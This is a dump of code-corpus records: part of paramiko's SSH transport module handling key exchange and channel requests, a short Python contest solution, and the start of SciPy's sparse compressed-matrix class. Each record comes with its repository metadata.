raise SSHException(msg.format(version))
msg = "Connected (version {}, client {})".format(version, client)
self._log(INFO, msg)
def _send_kex_init(self):
self.clear_to_send_lock.acquire()
try:
self.clear_to_send.clear()
finally:
self.clear_to_send_lock.release()
self.gss_kex_used = False
self.in_kex = True
if self.server_mode:
mp_required_prefix = "diffie-hellman-group-exchange-sha"
kex_mp = [
k
for k in self._preferred_kex
if k.startswith(mp_required_prefix)
]
if (self._modulus_pack is None) and (len(kex_mp) > 0):
# can't do group-exchange if we don't have a pack of potential
# primes
pkex = [
k
for k in self.get_security_options().kex
if not k.startswith(mp_required_prefix)
]
self.get_security_options().kex = pkex
available_server_keys = list(
filter(
list(self.server_key_dict.keys()).__contains__,
self._preferred_keys,
)
)
else:
available_server_keys = self._preferred_keys
m = Message()
m.add_byte(cMSG_KEXINIT)
m.add_bytes(os.urandom(16))
m.add_list(self._preferred_kex)
m.add_list(available_server_keys)
m.add_list(self._preferred_ciphers)
m.add_list(self._preferred_ciphers)
m.add_list(self._preferred_macs)
m.add_list(self._preferred_macs)
m.add_list(self._preferred_compression)
m.add_list(self._preferred_compression)
m.add_string(bytes())
m.add_string(bytes())
m.add_boolean(False)
m.add_int(0)
# save a copy for later (needed to compute a hash)
self.local_kex_init = m.asbytes()
self._send_message(m)
def _parse_kex_init(self, m):
m.get_bytes(16) # cookie, discarded
kex_algo_list = m.get_list()
server_key_algo_list = m.get_list()
client_encrypt_algo_list = m.get_list()
server_encrypt_algo_list = m.get_list()
client_mac_algo_list = m.get_list()
server_mac_algo_list = m.get_list()
client_compress_algo_list = m.get_list()
server_compress_algo_list = m.get_list()
client_lang_list = m.get_list()
server_lang_list = m.get_list()
kex_follows = m.get_boolean()
m.get_int() # unused
self._log(
DEBUG,
"kex algos:"
+ str(kex_algo_list)
+ " server key:"
+ str(server_key_algo_list)
+ " client encrypt:"
+ str(client_encrypt_algo_list)
+ " server encrypt:"
+ str(server_encrypt_algo_list)
+ " client mac:"
+ str(client_mac_algo_list)
+ " server mac:"
+ str(server_mac_algo_list)
+ " client compress:"
+ str(client_compress_algo_list)
+ " server compress:"
+ str(server_compress_algo_list)
+ " client lang:"
+ str(client_lang_list)
+ " server lang:"
+ str(server_lang_list)
+ " kex follows?"
+ str(kex_follows),
)
# as a server, we pick the first item in the client's list that we
if self.server_mode:
agreed_kex = list(
filter(self._preferred_kex.__contains__, kex_algo_list)
)
else:
agreed_kex = list(
filter(kex_algo_list.__contains__, self._preferred_kex)
)
if len(agreed_kex) == 0:
raise SSHException(
"Incompatible ssh peer (no acceptable kex algorithm)"
)
self.kex_engine = self._kex_info[agreed_kex[0]](self)
self._log(DEBUG, "Kex agreed: {}".format(agreed_kex[0]))
if self.server_mode:
available_server_keys = list(
filter(
list(self.server_key_dict.keys()).__contains__,
self._preferred_keys,
)
)
agreed_keys = list(
filter(
available_server_keys.__contains__, server_key_algo_list
)
)
else:
agreed_keys = list(
filter(server_key_algo_list.__contains__, self._preferred_keys)
)
if len(agreed_keys) == 0:
raise SSHException(
"Incompatible ssh peer (no acceptable host key)"
)
self.host_key_type = agreed_keys[0]
if self.server_mode and (self.get_server_key() is None):
raise SSHException(
"Incompatible ssh peer (can't match requested host key type)"
) # noqa
self._log_agreement("HostKey", agreed_keys[0], agreed_keys[0])
if self.server_mode:
agreed_local_ciphers = list(
filter(
self._preferred_ciphers.__contains__,
server_encrypt_algo_list,
)
)
agreed_remote_ciphers = list(
filter(
self._preferred_ciphers.__contains__,
client_encrypt_algo_list,
)
)
else:
agreed_local_ciphers = list(
filter(
client_encrypt_algo_list.__contains__,
self._preferred_ciphers,
)
)
agreed_remote_ciphers = list(
filter(
server_encrypt_algo_list.__contains__,
self._preferred_ciphers,
)
)
if len(agreed_local_ciphers) == 0 or len(agreed_remote_ciphers) == 0:
raise SSHException(
"Incompatible ssh server (no acceptable ciphers)"
) # noqa
self.local_cipher = agreed_local_ciphers[0]
self.remote_cipher = agreed_remote_ciphers[0]
self._log_agreement(
"Cipher", local=self.local_cipher, remote=self.remote_cipher
)
if self.server_mode:
agreed_remote_macs = list(
filter(self._preferred_macs.__contains__, client_mac_algo_list)
)
agreed_local_macs = list(
filter(self._preferred_macs.__contains__, server_mac_algo_list)
)
else:
agreed_local_macs = list(
filter(client_mac_algo_list.__contains__, self._preferred_macs)
)
agreed_remote_macs = list(
filter(server_mac_algo_list.__contains__, self._preferred_macs)
)
if (len(agreed_local_macs) == 0) or (len(agreed_remote_macs) == 0):
raise SSHException("Incompatible ssh server (no acceptable macs)")
self.local_mac = agreed_local_macs[0]
self.remote_mac = agreed_remote_macs[0]
self._log_agreement(
"MAC", local=self.local_mac, remote=self.remote_mac
)
if self.server_mode:
agreed_remote_compression = list(
filter(
self._preferred_compression.__contains__,
client_compress_algo_list,
)
)
agreed_local_compression = list(
filter(
self._preferred_compression.__contains__,
server_compress_algo_list,
)
)
else:
agreed_local_compression = list(
filter(
client_compress_algo_list.__contains__,
self._preferred_compression,
)
)
agreed_remote_compression = list(
filter(
server_compress_algo_list.__contains__,
self._preferred_compression,
)
)
if (
len(agreed_local_compression) == 0
or len(agreed_remote_compression) == 0
):
msg = "Incompatible ssh server (no acceptable compression)"
msg += " {!r} {!r} {!r}"
raise SSHException(
msg.format(
agreed_local_compression,
agreed_remote_compression,
self._preferred_compression,
)
)
self.local_compression = agreed_local_compression[0]
self.remote_compression = agreed_remote_compression[0]
self._log_agreement(
"Compression",
local=self.local_compression,
remote=self.remote_compression,
)
# save for computing hash later...
# now wait! openssh has a bug (and others might too) where there are
# actually some extra bytes (one NUL byte in openssh's case) added to
self.remote_kex_init = cMSG_KEXINIT + m.get_so_far()
def _activate_inbound(self):
block_size = self._cipher_info[self.remote_cipher]["block-size"]
if self.server_mode:
IV_in = self._compute_key("A", block_size)
key_in = self._compute_key(
"C", self._cipher_info[self.remote_cipher]["key-size"]
)
else:
IV_in = self._compute_key("B", block_size)
key_in = self._compute_key(
"D", self._cipher_info[self.remote_cipher]["key-size"]
)
engine = self._get_cipher(
self.remote_cipher, key_in, IV_in, self._DECRYPT
)
mac_size = self._mac_info[self.remote_mac]["size"]
mac_engine = self._mac_info[self.remote_mac]["class"]
# initial mac keys are done in the hash's natural size (not the
if self.server_mode:
mac_key = self._compute_key("E", mac_engine().digest_size)
else:
mac_key = self._compute_key("F", mac_engine().digest_size)
self.packetizer.set_inbound_cipher(
engine, block_size, mac_engine, mac_size, mac_key
)
compress_in = self._compression_info[self.remote_compression][1]
if compress_in is not None and (
self.remote_compression != "zlib@openssh.com" or self.authenticated
):
self._log(DEBUG, "Switching on inbound compression ...")
self.packetizer.set_inbound_compressor(compress_in())
def _activate_outbound(self):
m = Message()
m.add_byte(cMSG_NEWKEYS)
self._send_message(m)
block_size = self._cipher_info[self.local_cipher]["block-size"]
if self.server_mode:
IV_out = self._compute_key("B", block_size)
key_out = self._compute_key(
"D", self._cipher_info[self.local_cipher]["key-size"]
)
else:
IV_out = self._compute_key("A", block_size)
key_out = self._compute_key(
"C", self._cipher_info[self.local_cipher]["key-size"]
)
engine = self._get_cipher(
self.local_cipher, key_out, IV_out, self._ENCRYPT
)
mac_size = self._mac_info[self.local_mac]["size"]
mac_engine = self._mac_info[self.local_mac]["class"]
# potentially truncated transmission size)
if self.server_mode:
mac_key = self._compute_key("F", mac_engine().digest_size)
else:
mac_key = self._compute_key("E", mac_engine().digest_size)
sdctr = self.local_cipher.endswith("-ctr")
self.packetizer.set_outbound_cipher(
engine, block_size, mac_engine, mac_size, mac_key, sdctr
)
compress_out = self._compression_info[self.local_compression][0]
if compress_out is not None and (
self.local_compression != "zlib@openssh.com" or self.authenticated
):
self._log(DEBUG, "Switching on outbound compression ...")
self.packetizer.set_outbound_compressor(compress_out())
if not self.packetizer.need_rekey():
self.in_kex = False
# we always expect to receive NEWKEYS now
self._expect_packet(MSG_NEWKEYS)
def _auth_trigger(self):
self.authenticated = True
# delayed initiation of compression
if self.local_compression == "zlib@openssh.com":
compress_out = self._compression_info[self.local_compression][0]
self._log(DEBUG, "Switching on outbound compression ...")
self.packetizer.set_outbound_compressor(compress_out())
if self.remote_compression == "zlib@openssh.com":
compress_in = self._compression_info[self.remote_compression][1]
self._log(DEBUG, "Switching on inbound compression ...")
self.packetizer.set_inbound_compressor(compress_in())
def _parse_newkeys(self, m):
self._log(DEBUG, "Switch to new keys ...")
self._activate_inbound()
# can also free a bunch of stuff here
self.local_kex_init = self.remote_kex_init = None
self.K = None
self.kex_engine = None
if self.server_mode and (self.auth_handler is None):
# create auth handler for server mode
self.auth_handler = AuthHandler(self)
if not self.initial_kex_done:
# this was the first key exchange
self.initial_kex_done = True
# send an event?
if self.completion_event is not None:
self.completion_event.set()
# it's now okay to send data again (if this was a re-key)
if not self.packetizer.need_rekey():
self.in_kex = False
self.clear_to_send_lock.acquire()
try:
self.clear_to_send.set()
finally:
self.clear_to_send_lock.release()
return
def _parse_disconnect(self, m):
code = m.get_int()
desc = m.get_text()
self._log(INFO, "Disconnect (code {:d}): {}".format(code, desc))
def _parse_global_request(self, m):
kind = m.get_text()
self._log(DEBUG, 'Received global request "{}"'.format(kind))
want_reply = m.get_boolean()
if not self.server_mode:
self._log(
DEBUG,
'Rejecting "{}" global request from server.'.format(kind),
)
ok = False
elif kind == "tcpip-forward":
address = m.get_text()
port = m.get_int()
ok = self.server_object.check_port_forward_request(address, port)
if ok:
ok = (ok,)
elif kind == "cancel-tcpip-forward":
address = m.get_text()
port = m.get_int()
self.server_object.cancel_port_forward_request(address, port)
ok = True
else:
ok = self.server_object.check_global_request(kind, m)
extra = ()
if type(ok) is tuple:
extra = ok
ok = True
if want_reply:
msg = Message()
if ok:
msg.add_byte(cMSG_REQUEST_SUCCESS)
msg.add(*extra)
else:
msg.add_byte(cMSG_REQUEST_FAILURE)
self._send_message(msg)
def _parse_request_success(self, m):
self._log(DEBUG, "Global request successful.")
self.global_response = m
if self.completion_event is not None:
self.completion_event.set()
def _parse_request_failure(self, m):
self._log(DEBUG, "Global request denied.")
self.global_response = None
if self.completion_event is not None:
self.completion_event.set()
def _parse_channel_open_success(self, m):
chanid = m.get_int()
server_chanid = m.get_int()
server_window_size = m.get_int()
server_max_packet_size = m.get_int()
chan = self._channels.get(chanid)
if chan is None:
self._log(WARNING, "Success for unrequested channel! [??]")
return
self.lock.acquire()
try:
chan._set_remote_channel(
server_chanid, server_window_size, server_max_packet_size
)
self._log(DEBUG, "Secsh channel {:d} opened.".format(chanid))
if chanid in self.channel_events:
self.channel_events[chanid].set()
del self.channel_events[chanid]
finally:
self.lock.release()
return
def _parse_channel_open_failure(self, m):
chanid = m.get_int()
reason = m.get_int()
reason_str = m.get_text()
m.get_text()
reason_text = CONNECTION_FAILED_CODE.get(reason, "(unknown code)")
self._log(
ERROR,
"Secsh channel {:d} open FAILED: {}: {}".format(
chanid, reason_str, reason_text
),
)
self.lock.acquire()
try:
self.saved_exception = ChannelException(reason, reason_text)
if chanid in self.channel_events:
self._channels.delete(chanid)
if chanid in self.channel_events:
self.channel_events[chanid].set()
del self.channel_events[chanid]
finally:
self.lock.release()
return
def _parse_channel_open(self, m):
kind = m.get_text()
chanid = m.get_int()
initial_window_size = m.get_int()
max_packet_size = m.get_int()
reject = False
if (
kind == "auth-agent@openssh.com"
and self._forward_agent_handler is not None
):
self._log(DEBUG, "Incoming forward agent connection")
self.lock.acquire()
try:
my_chanid = self._next_channel()
finally:
self.lock.release()
elif (kind == "x11") and (self._x11_handler is not None):
origin_addr = m.get_text()
origin_port = m.get_int()
self._log(
DEBUG,
"Incoming x11 connection from {}:{:d}".format(
origin_addr, origin_port
),
)
self.lock.acquire()
try:
my_chanid = self._next_channel()
finally:
self.lock.release()
elif (kind == "forwarded-tcpip") and (self._tcp_handler is not None):
server_addr = m.get_text()
server_port = m.get_int()
origin_addr = m.get_text()
origin_port = m.get_int()
self._log(
DEBUG,
"Incoming tcp forwarded connection from {}:{:d}".format(
origin_addr, origin_port
),
)
self.lock.acquire()
try:
my_chanid = self._next_channel()
finally:
self.lock.release()
elif not self.server_mode:
self._log(
DEBUG,
'Rejecting "{}" channel request from server.'.format(kind),
)
reject = True
reason = OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
else:
self.lock.acquire()
try:
my_chanid = self._next_channel()
finally:
self.lock.release()
if kind == "direct-tcpip":
dest_addr = m.get_text()
dest_port = m.get_int()
origin_addr = m.get_text()
origin_port = m.get_int()
reason = self.server_object.check_channel_direct_tcpip_request(
my_chanid,
(origin_addr, origin_port),
(dest_addr, dest_port),
)
else:
reason = self.server_object.check_channel_request(
kind, my_chanid
)
if reason != OPEN_SUCCEEDED:
self._log(
DEBUG,
'Rejecting "{}" channel request from client.'.format(kind),
)
reject = True
if reject:
msg = Message()
msg.add_byte(cMSG_CHANNEL_OPEN_FAILURE)
msg.add_int(chanid)
msg.add_int(reason)
msg.add_string("")
msg.add_string("en")
self._send_message(msg)
return
chan = Channel(my_chanid)
self.lock.acquire()
try:
self._channels.put(my_chanid, chan)
self.channels_seen[my_chanid] = True
chan._set_transport(self)
chan._set_window(
self.default_window_size, self.default_max_packet_size
)
chan._set_remote_channel(
chanid, initial_window_size, max_packet_size
)
finally:
self.lock.release()
m = Message()
m.add_byte(cMSG_CHANNEL_OPEN_SUCCESS)
m.add_int(chanid)
m.add_int(my_chanid)
m.add_int(self.default_window_size)
m.add_int(self.default_max_packet_size)
self._send_message(m)
self._log(
DEBUG, "Secsh channel {:d} ({}) opened.".format(my_chanid, kind)
)
if kind == "auth-agent@openssh.com":
self._forward_agent_handler(chan)
elif kind == "x11":
self._x11_handler(chan, (origin_addr, origin_port))
elif kind == "forwarded-tcpip":
chan.origin_addr = (origin_addr, origin_port)
self._tcp_handler(
chan, (origin_addr, origin_port), (server_addr, server_port)
)
else:
self._queue_incoming_channel(chan)
def _parse_debug(self, m):
m.get_boolean()
msg = m.get_string()
m.get_string()
self._log(DEBUG, "Debug msg: {}".format(util.safe_string(msg)))
def _get_subsystem_handler(self, name):
try:
self.lock.acquire()
if name not in self.subsystem_table:
return None, [], {}
return self.subsystem_table[name]
finally:
self.lock.release()
_handler_table = {
MSG_NEWKEYS: _parse_newkeys,
MSG_GLOBAL_REQUEST: _parse_global_request,
MSG_REQUEST_SUCCESS: _parse_request_success,
MSG_REQUEST_FAILURE: _parse_request_failure,
MSG_CHANNEL_OPEN_SUCCESS: _parse_channel_open_success,
MSG_CHANNEL_OPEN_FAILURE: _parse_channel_open_failure,
MSG_CHANNEL_OPEN: _parse_channel_open,
MSG_KEXINIT: _negotiate_keys,
}
_channel_handler_table = {
MSG_CHANNEL_SUCCESS: Channel._request_success,
MSG_CHANNEL_FAILURE: Channel._request_failed,
MSG_CHANNEL_DATA: Channel._feed,
MSG_CHANNEL_EXTENDED_DATA: Channel._feed_extended,
MSG_CHANNEL_WINDOW_ADJUST: Channel._window_adjust,
MSG_CHANNEL_REQUEST: Channel._handle_request,
MSG_CHANNEL_EOF: Channel._handle_eof,
MSG_CHANNEL_CLOSE: Channel._handle_close,
}
class SecurityOptions(object):
__slots__ = "_transport"
def __init__(self, transport):
self._transport = transport
def __repr__(self):
return "<paramiko.SecurityOptions for {!r}>".format(self._transport)
def _set(self, name, orig, x):
if type(x) is list:
x = tuple(x)
if type(x) is not tuple:
raise TypeError("expected tuple or list")
possible = list(getattr(self._transport, orig).keys())
forbidden = [n for n in x if n not in possible]
if len(forbidden) > 0:
raise ValueError("unknown cipher")
setattr(self._transport, name, x)
@property
def ciphers(self):
return self._transport._preferred_ciphers
@ciphers.setter
def ciphers(self, x):
self._set("_preferred_ciphers", "_cipher_info", x)
@property
def digests(self):
return self._transport._preferred_macs
@digests.setter
def digests(self, x):
self._set("_preferred_macs", "_mac_info", x)
@property
def key_types(self):
return self._transport._preferred_keys
@key_types.setter
def key_types(self, x):
self._set("_preferred_keys", "_key_info", x)
@property
def kex(self):
return self._transport._preferred_kex
@kex.setter
def kex(self, x):
self._set("_preferred_kex", "_kex_info", x)
@property
def compression(self):
return self._transport._preferred_compression
@compression.setter
def compression(self, x):
self._set("_preferred_compression", "_compression_info", x)
class ChannelMap(object):
def __init__(self):
self._map = weakref.WeakValueDictionary()
self._lock = threading.Lock()
def put(self, chanid, chan):
self._lock.acquire()
try:
self._map[chanid] = chan
finally:
self._lock.release()
def get(self, chanid):
self._lock.acquire()
try:
return self._map.get(chanid, None)
finally:
self._lock.release()
def delete(self, chanid):
self._lock.acquire()
try:
try:
del self._map[chanid]
except KeyError:
pass
finally:
self._lock.release()
def values(self):
self._lock.acquire()
try:
return list(self._map.values())
finally:
self._lock.release()
def __len__(self):
self._lock.acquire()
try:
return len(self._map)
finally:
self._lock.release()
| true | true |
f72eef8c95e4f3ef8a9225bc7ec3eeffb64fa31f | 131 | py | Python | Gluharniki.py | regostar/competitive_prog_py | 56db79c431c5823039e6749063f3b21d5e79ca44 | [
"MIT"
] | null | null | null | Gluharniki.py | regostar/competitive_prog_py | 56db79c431c5823039e6749063f3b21d5e79ca44 | [
"MIT"
] | null | null | null | Gluharniki.py | regostar/competitive_prog_py | 56db79c431c5823039e6749063f3b21d5e79ca44 | [
"MIT"
] | null | null | null | from math import ceil
t = int(input())
for _ in range(t):
row, col = map(int,input().split())
print(ceil((row * col) / 2)) | 21.833333 | 39 | 0.587786 | from math import ceil
t = int(input())
for _ in range(t):
row, col = map(int,input().split())
print(ceil((row * col) / 2)) | true | true |
f72ef03ed69fe6f6031c918f52dc15739624e63f | 50,478 | py | Python | scipy/sparse/compressed.py | ririw/scipy | 680ecf8c52966343827903e6b7983b1ef7323fe2 | [
"BSD-3-Clause"
] | null | null | null | scipy/sparse/compressed.py | ririw/scipy | 680ecf8c52966343827903e6b7983b1ef7323fe2 | [
"BSD-3-Clause"
] | null | null | null | scipy/sparse/compressed.py | ririw/scipy | 680ecf8c52966343827903e6b7983b1ef7323fe2 | [
"BSD-3-Clause"
] | null | null | null | """Base class for sparse matrix formats using compressed storage."""
from __future__ import division, print_function, absolute_import
__all__ = []
from warnings import warn
import operator
import numpy as np
from scipy._lib._util import _prune_array
from .base import spmatrix, isspmatrix, SparseEfficiencyWarning
from .data import _data_matrix, _minmax_mixin
from .dia import dia_matrix
from . import _sparsetools
from ._sparsetools import (get_csr_submatrix, csr_sample_offsets, csr_todense,
csr_sample_values, csr_row_index, csr_row_slice,
csr_column_index1, csr_column_index2)
from ._index import IndexMixin
from .sputils import (upcast, upcast_char, to_native, isdense, isshape,
getdtype, isscalarlike, isintlike, get_index_dtype,
downcast_intp_index, get_sum_dtype, check_shape,
matrix, asmatrix, is_pydata_spmatrix)
class _cs_matrix(_data_matrix, _minmax_mixin, IndexMixin):
"""base matrix class for compressed row- and column-oriented matrices"""
def __init__(self, arg1, shape=None, dtype=None, copy=False):
_data_matrix.__init__(self)
if isspmatrix(arg1):
if arg1.format == self.format and copy:
arg1 = arg1.copy()
else:
arg1 = arg1.asformat(self.format)
self._set_self(arg1)
elif isinstance(arg1, tuple):
if isshape(arg1):
# It's a tuple of matrix dimensions (M, N)
# create empty matrix
self._shape = check_shape(arg1)
M, N = self.shape
# Select index dtype large enough to pass array and
# scalar parameters to sparsetools
idx_dtype = get_index_dtype(maxval=max(M, N))
self.data = np.zeros(0, getdtype(dtype, default=float))
self.indices = np.zeros(0, idx_dtype)
self.indptr = np.zeros(self._swap((M, N))[0] + 1,
dtype=idx_dtype)
else:
if len(arg1) == 2:
# (data, ij) format
from .coo import coo_matrix
other = self.__class__(coo_matrix(arg1, shape=shape))
self._set_self(other)
elif len(arg1) == 3:
# (data, indices, indptr) format
(data, indices, indptr) = arg1
# Select index dtype large enough to pass array and
# scalar parameters to sparsetools
maxval = None
if shape is not None:
maxval = max(shape)
idx_dtype = get_index_dtype((indices, indptr),
maxval=maxval,
check_contents=True)
self.indices = np.array(indices, copy=copy,
dtype=idx_dtype)
self.indptr = np.array(indptr, copy=copy, dtype=idx_dtype)
self.data = np.array(data, copy=copy, dtype=dtype)
else:
raise ValueError("unrecognized {}_matrix "
"constructor usage".format(self.format))
else:
# must be dense
try:
arg1 = np.asarray(arg1)
except Exception:
raise ValueError("unrecognized {}_matrix constructor usage"
"".format(self.format))
from .coo import coo_matrix
self._set_self(self.__class__(coo_matrix(arg1, dtype=dtype)))
# Read matrix dimensions given, if any
if shape is not None:
self._shape = check_shape(shape)
else:
if self.shape is None:
# shape not already set, try to infer dimensions
try:
major_dim = len(self.indptr) - 1
minor_dim = self.indices.max() + 1
except Exception:
raise ValueError('unable to infer matrix dimensions')
else:
self._shape = check_shape(self._swap((major_dim,
minor_dim)))
if dtype is not None:
self.data = self.data.astype(dtype, copy=False)
self.check_format(full_check=False)
def getnnz(self, axis=None):
if axis is None:
return int(self.indptr[-1])
else:
if axis < 0:
axis += 2
axis, _ = self._swap((axis, 1 - axis))
_, N = self._swap(self.shape)
if axis == 0:
return np.bincount(downcast_intp_index(self.indices),
minlength=N)
elif axis == 1:
return np.diff(self.indptr)
raise ValueError('axis out of bounds')
getnnz.__doc__ = spmatrix.getnnz.__doc__
def _set_self(self, other, copy=False):
"""take the member variables of other and assign them to self"""
if copy:
other = other.copy()
self.data = other.data
self.indices = other.indices
self.indptr = other.indptr
self._shape = check_shape(other.shape)
def check_format(self, full_check=True):
"""check whether the matrix format is valid
Parameters
----------
full_check : bool, optional
If `True`, rigorous check, O(N) operations. Otherwise
basic check, O(1) operations (default True).
"""
# use _swap to determine proper bounds
major_name, minor_name = self._swap(('row', 'column'))
major_dim, minor_dim = self._swap(self.shape)
# index arrays should have integer data types
if self.indptr.dtype.kind != 'i':
warn("indptr array has non-integer dtype ({})"
"".format(self.indptr.dtype.name), stacklevel=3)
if self.indices.dtype.kind != 'i':
warn("indices array has non-integer dtype ({})"
"".format(self.indices.dtype.name), stacklevel=3)
idx_dtype = get_index_dtype((self.indptr, self.indices))
self.indptr = np.asarray(self.indptr, dtype=idx_dtype)
self.indices = np.asarray(self.indices, dtype=idx_dtype)
self.data = to_native(self.data)
# check array shapes
for x in [self.data.ndim, self.indices.ndim, self.indptr.ndim]:
if x != 1:
raise ValueError('data, indices, and indptr should be 1-D')
# check index pointer
if (len(self.indptr) != major_dim + 1):
raise ValueError("index pointer size ({}) should be ({})"
"".format(len(self.indptr), major_dim + 1))
if (self.indptr[0] != 0):
raise ValueError("index pointer should start with 0")
# check index and data arrays
if (len(self.indices) != len(self.data)):
raise ValueError("indices and data should have the same size")
if (self.indptr[-1] > len(self.indices)):
raise ValueError("Last value of index pointer should be less than "
"the size of index and data arrays")
self.prune()
if full_check:
# check format validity (more expensive)
if self.nnz > 0:
if self.indices.max() >= minor_dim:
raise ValueError("{} index values must be < {}"
"".format(minor_name, minor_dim))
if self.indices.min() < 0:
raise ValueError("{} index values must be >= 0"
"".format(minor_name))
if np.diff(self.indptr).min() < 0:
raise ValueError("index pointer values must form a "
"non-decreasing sequence")
# if not self.has_sorted_indices():
# warn('Indices were not in sorted order. Sorting indices.')
# self.sort_indices()
# assert(self.has_sorted_indices())
# TODO check for duplicates?
#######################
# Boolean comparisons #
#######################
def _scalar_binopt(self, other, op):
"""Scalar version of self._binopt, for cases in which no new nonzeros
are added. Produces a new spmatrix in canonical form.
"""
self.sum_duplicates()
res = self._with_data(op(self.data, other), copy=True)
res.eliminate_zeros()
return res
def __eq__(self, other):
# Scalar other.
if isscalarlike(other):
if np.isnan(other):
return self.__class__(self.shape, dtype=np.bool_)
if other == 0:
warn("Comparing a sparse matrix with 0 using == is inefficient"
", try using != instead.", SparseEfficiencyWarning,
stacklevel=3)
all_true = self.__class__(np.ones(self.shape, dtype=np.bool_))
inv = self._scalar_binopt(other, operator.ne)
return all_true - inv
else:
return self._scalar_binopt(other, operator.eq)
# Dense other.
elif isdense(other):
return self.todense() == other
# Pydata sparse other.
elif is_pydata_spmatrix(other):
return NotImplemented
# Sparse other.
elif isspmatrix(other):
warn("Comparing sparse matrices using == is inefficient, try using"
" != instead.", SparseEfficiencyWarning, stacklevel=3)
# TODO sparse broadcasting
if self.shape != other.shape:
return False
elif self.format != other.format:
other = other.asformat(self.format)
res = self._binopt(other, '_ne_')
all_true = self.__class__(np.ones(self.shape, dtype=np.bool_))
return all_true - res
else:
return False
def __ne__(self, other):
# Scalar other.
if isscalarlike(other):
if np.isnan(other):
warn("Comparing a sparse matrix with nan using != is"
" inefficient", SparseEfficiencyWarning, stacklevel=3)
all_true = self.__class__(np.ones(self.shape, dtype=np.bool_))
return all_true
elif other != 0:
warn("Comparing a sparse matrix with a nonzero scalar using !="
" is inefficient, try using == instead.",
SparseEfficiencyWarning, stacklevel=3)
all_true = self.__class__(np.ones(self.shape), dtype=np.bool_)
inv = self._scalar_binopt(other, operator.eq)
return all_true - inv
else:
return self._scalar_binopt(other, operator.ne)
# Dense other.
elif isdense(other):
return self.todense() != other
# Pydata sparse other.
elif is_pydata_spmatrix(other):
return NotImplemented
# Sparse other.
elif isspmatrix(other):
# TODO sparse broadcasting
if self.shape != other.shape:
return True
elif self.format != other.format:
other = other.asformat(self.format)
return self._binopt(other, '_ne_')
else:
return True
def _inequality(self, other, op, op_name, bad_scalar_msg):
# Scalar other.
if isscalarlike(other):
if 0 == other and op_name in ('_le_', '_ge_'):
raise NotImplementedError(" >= and <= don't work with 0.")
elif op(0, other):
warn(bad_scalar_msg, SparseEfficiencyWarning)
other_arr = np.empty(self.shape, dtype=np.result_type(other))
other_arr.fill(other)
other_arr = self.__class__(other_arr)
return self._binopt(other_arr, op_name)
else:
return self._scalar_binopt(other, op)
# Dense other.
elif isdense(other):
return op(self.todense(), other)
# Sparse other.
elif isspmatrix(other):
# TODO sparse broadcasting
if self.shape != other.shape:
raise ValueError("inconsistent shapes")
elif self.format != other.format:
other = other.asformat(self.format)
if op_name not in ('_ge_', '_le_'):
return self._binopt(other, op_name)
warn("Comparing sparse matrices using >= and <= is inefficient, "
"using <, >, or !=, instead.", SparseEfficiencyWarning)
all_true = self.__class__(np.ones(self.shape, dtype=np.bool_))
res = self._binopt(other, '_gt_' if op_name == '_le_' else '_lt_')
return all_true - res
else:
raise ValueError("Operands could not be compared.")
def __lt__(self, other):
return self._inequality(other, operator.lt, '_lt_',
"Comparing a sparse matrix with a scalar "
"greater than zero using < is inefficient, "
"try using >= instead.")
def __gt__(self, other):
return self._inequality(other, operator.gt, '_gt_',
"Comparing a sparse matrix with a scalar "
"less than zero using > is inefficient, "
"try using <= instead.")
def __le__(self, other):
return self._inequality(other, operator.le, '_le_',
"Comparing a sparse matrix with a scalar "
"greater than zero using <= is inefficient, "
"try using > instead.")
def __ge__(self, other):
return self._inequality(other, operator.ge, '_ge_',
"Comparing a sparse matrix with a scalar "
"less than zero using >= is inefficient, "
"try using < instead.")
#################################
# Arithmetic operator overrides #
#################################
def _add_dense(self, other):
if other.shape != self.shape:
raise ValueError('Incompatible shapes.')
dtype = upcast_char(self.dtype.char, other.dtype.char)
order = self._swap('CF')[0]
result = np.array(other, dtype=dtype, order=order, copy=True)
M, N = self._swap(self.shape)
y = result if result.flags.c_contiguous else result.T
csr_todense(M, N, self.indptr, self.indices, self.data, y)
return matrix(result, copy=False)
def _add_sparse(self, other):
return self._binopt(other, '_plus_')
def _sub_sparse(self, other):
return self._binopt(other, '_minus_')
def multiply(self, other):
"""Point-wise multiplication by another matrix, vector, or
scalar.
"""
# Scalar multiplication.
if isscalarlike(other):
return self._mul_scalar(other)
# Sparse matrix or vector.
if isspmatrix(other):
if self.shape == other.shape:
other = self.__class__(other)
return self._binopt(other, '_elmul_')
# Single element.
elif other.shape == (1, 1):
return self._mul_scalar(other.toarray()[0, 0])
elif self.shape == (1, 1):
return other._mul_scalar(self.toarray()[0, 0])
# A row times a column.
elif self.shape[1] == 1 and other.shape[0] == 1:
return self._mul_sparse_matrix(other.tocsc())
elif self.shape[0] == 1 and other.shape[1] == 1:
return other._mul_sparse_matrix(self.tocsc())
# Row vector times matrix. other is a row.
elif other.shape[0] == 1 and self.shape[1] == other.shape[1]:
other = dia_matrix((other.toarray().ravel(), [0]),
shape=(other.shape[1], other.shape[1]))
return self._mul_sparse_matrix(other)
# self is a row.
elif self.shape[0] == 1 and self.shape[1] == other.shape[1]:
copy = dia_matrix((self.toarray().ravel(), [0]),
shape=(self.shape[1], self.shape[1]))
return other._mul_sparse_matrix(copy)
# Column vector times matrix. other is a column.
elif other.shape[1] == 1 and self.shape[0] == other.shape[0]:
other = dia_matrix((other.toarray().ravel(), [0]),
shape=(other.shape[0], other.shape[0]))
return other._mul_sparse_matrix(self)
# self is a column.
elif self.shape[1] == 1 and self.shape[0] == other.shape[0]:
copy = dia_matrix((self.toarray().ravel(), [0]),
shape=(self.shape[0], self.shape[0]))
return copy._mul_sparse_matrix(other)
else:
raise ValueError("inconsistent shapes")
# Assume other is a dense matrix/array, which produces a single-item
# object array if other isn't convertible to ndarray.
other = np.atleast_2d(other)
if other.ndim != 2:
return np.multiply(self.toarray(), other)
# Single element / wrapped object.
if other.size == 1:
return self._mul_scalar(other.flat[0])
# Fast case for trivial sparse matrix.
elif self.shape == (1, 1):
return np.multiply(self.toarray()[0, 0], other)
from .coo import coo_matrix
ret = self.tocoo()
# Matching shapes.
if self.shape == other.shape:
data = np.multiply(ret.data, other[ret.row, ret.col])
# Sparse row vector times...
elif self.shape[0] == 1:
if other.shape[1] == 1: # Dense column vector.
data = np.multiply(ret.data, other)
elif other.shape[1] == self.shape[1]: # Dense matrix.
data = np.multiply(ret.data, other[:, ret.col])
else:
raise ValueError("inconsistent shapes")
row = np.repeat(np.arange(other.shape[0]), len(ret.row))
col = np.tile(ret.col, other.shape[0])
return coo_matrix((data.view(np.ndarray).ravel(), (row, col)),
shape=(other.shape[0], self.shape[1]),
